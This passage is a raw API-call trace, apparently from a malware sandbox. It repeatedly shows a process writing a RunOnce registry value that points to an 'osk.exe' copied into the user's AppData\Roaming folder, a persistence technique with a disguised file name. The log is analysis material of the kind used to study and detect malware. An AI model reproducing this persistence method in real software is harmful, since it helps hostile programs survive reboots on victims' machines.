hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.144] KillTimer (hWnd=0x20280, uIDEvent=0x211c) returned 1 [0083.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.144] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.144] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.145] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.145] RegCloseKey (hKey=0x280) returned 0x0 [0083.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.145] SetTimer (hWnd=0x20280, nIDEvent=0x211d, uElapse=0xa, lpTimerFunc=0x0) returned 0x211d [0083.145] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.153] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.153] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.154] KillTimer (hWnd=0x20280, uIDEvent=0x211d) returned 1 [0083.154] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.154] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.154] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.155] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.155] RegCloseKey (hKey=0x280) returned 0x0 [0083.155] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.155] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.155] SetTimer (hWnd=0x20280, nIDEvent=0x211e, uElapse=0xa, lpTimerFunc=0x0) returned 0x211e [0083.155] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.169] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.169] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.169] KillTimer (hWnd=0x20280, 
uIDEvent=0x211e) returned 1 [0083.170] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.170] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.170] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.170] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.170] RegCloseKey (hKey=0x280) returned 0x0 [0083.170] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.171] SetTimer (hWnd=0x20280, nIDEvent=0x211f, uElapse=0xa, lpTimerFunc=0x0) returned 0x211f [0083.171] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.186] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.186] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.186] KillTimer (hWnd=0x20280, uIDEvent=0x211f) returned 1 [0083.186] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.187] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.187] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.187] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.187] RegCloseKey (hKey=0x280) returned 0x0 [0083.187] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.187] SetTimer (hWnd=0x20280, nIDEvent=0x2120, uElapse=0xa, lpTimerFunc=0x0) returned 0x2120 [0083.187] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.200] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.200] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.200] KillTimer (hWnd=0x20280, uIDEvent=0x2120) returned 1 [0083.201] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.201] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.201] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.201] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.201] RegCloseKey (hKey=0x280) returned 0x0 [0083.202] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.202] SetTimer (hWnd=0x20280, nIDEvent=0x2121, uElapse=0xa, lpTimerFunc=0x0) returned 0x2121 [0083.202] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.216] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.216] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.216] KillTimer (hWnd=0x20280, uIDEvent=0x2121) returned 1 [0083.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0083.217] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.217] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.217] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.217] RegCloseKey (hKey=0x280) returned 0x0 [0083.218] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.218] SetTimer (hWnd=0x20280, nIDEvent=0x2122, uElapse=0xa, lpTimerFunc=0x0) returned 0x2122 [0083.218] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.232] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.232] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.232] KillTimer (hWnd=0x20280, uIDEvent=0x2122) returned 1 [0083.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.232] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.233] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.233] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.233] RegCloseKey (hKey=0x280) returned 0x0 
[0083.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.233] SetTimer (hWnd=0x20280, nIDEvent=0x2123, uElapse=0xa, lpTimerFunc=0x0) returned 0x2123 [0083.233] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.247] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.247] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.247] KillTimer (hWnd=0x20280, uIDEvent=0x2123) returned 1 [0083.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.248] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.248] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.248] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.248] RegCloseKey (hKey=0x280) returned 0x0 [0083.249] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.249] SetTimer (hWnd=0x20280, nIDEvent=0x2124, uElapse=0xa, lpTimerFunc=0x0) returned 0x2124 [0083.249] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.263] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.263] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.263] KillTimer (hWnd=0x20280, uIDEvent=0x2124) returned 1 [0083.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.264] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.264] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.264] RegCloseKey (hKey=0x280) returned 0x0 [0083.264] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.264] SetTimer (hWnd=0x20280, nIDEvent=0x2125, uElapse=0xa, lpTimerFunc=0x0) returned 0x2125 [0083.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.278] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.278] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.279] KillTimer (hWnd=0x20280, uIDEvent=0x2125) returned 1 [0083.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.279] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.279] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.280] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.280] RegCloseKey (hKey=0x280) returned 0x0 [0083.280] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.280] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.280] SetTimer (hWnd=0x20280, nIDEvent=0x2126, uElapse=0xa, lpTimerFunc=0x0) returned 0x2126 [0083.280] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.294] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.294] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.294] KillTimer (hWnd=0x20280, uIDEvent=0x2126) returned 1 [0083.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.295] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.295] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.295] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.296] RegCloseKey (hKey=0x280) returned 0x0 [0083.296] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.296] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.296] SetTimer (hWnd=0x20280, nIDEvent=0x2127, uElapse=0xa, lpTimerFunc=0x0) returned 0x2127 [0083.296] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.310] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.310] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.310] KillTimer (hWnd=0x20280, uIDEvent=0x2127) returned 1 [0083.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.310] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.311] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.311] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.311] RegCloseKey (hKey=0x280) returned 0x0 [0083.311] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.311] SetTimer (hWnd=0x20280, nIDEvent=0x2128, uElapse=0xa, lpTimerFunc=0x0) returned 0x2128 [0083.311] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.326] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.326] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.326] KillTimer (hWnd=0x20280, uIDEvent=0x2128) returned 1 [0083.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.327] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.327] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.327] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.327] RegCloseKey (hKey=0x280) returned 0x0 [0083.327] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0083.327] SetTimer (hWnd=0x20280, nIDEvent=0x2129, uElapse=0xa, lpTimerFunc=0x0) returned 0x2129 [0083.327] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.341] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.341] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.341] KillTimer (hWnd=0x20280, uIDEvent=0x2129) returned 1 [0083.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.342] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.342] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.342] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.342] RegCloseKey (hKey=0x280) returned 0x0 [0083.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.342] SetTimer (hWnd=0x20280, nIDEvent=0x212a, uElapse=0xa, lpTimerFunc=0x0) returned 0x212a [0083.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.356] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.356] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.356] KillTimer (hWnd=0x20280, uIDEvent=0x212a) returned 1 [0083.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.357] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.357] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.357] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.358] RegCloseKey (hKey=0x280) returned 0x0 [0083.358] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.358] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.358] SetTimer (hWnd=0x20280, nIDEvent=0x212b, uElapse=0xa, lpTimerFunc=0x0) returned 0x212b [0083.358] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.372] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.372] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.372] KillTimer (hWnd=0x20280, uIDEvent=0x212b) returned 1 [0083.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.373] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.373] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.373] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.373] RegCloseKey (hKey=0x280) returned 0x0 [0083.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.373] SetTimer (hWnd=0x20280, nIDEvent=0x212c, uElapse=0xa, lpTimerFunc=0x0) returned 0x212c 
[0083.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.388] KillTimer (hWnd=0x20280, uIDEvent=0x212c) returned 1 [0083.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.389] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.389] RegCloseKey (hKey=0x280) returned 0x0 [0083.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.389] SetTimer (hWnd=0x20280, nIDEvent=0x212d, uElapse=0xa, lpTimerFunc=0x0) returned 0x212d [0083.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.403] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.403] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.403] KillTimer (hWnd=0x20280, uIDEvent=0x212d) returned 1 [0083.403] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.404] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.404] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.404] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.404] RegCloseKey (hKey=0x280) returned 0x0 [0083.404] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.405] SetTimer (hWnd=0x20280, nIDEvent=0x212e, uElapse=0xa, lpTimerFunc=0x0) returned 0x212e [0083.405] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.419] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.419] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.419] KillTimer (hWnd=0x20280, uIDEvent=0x212e) returned 1 [0083.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 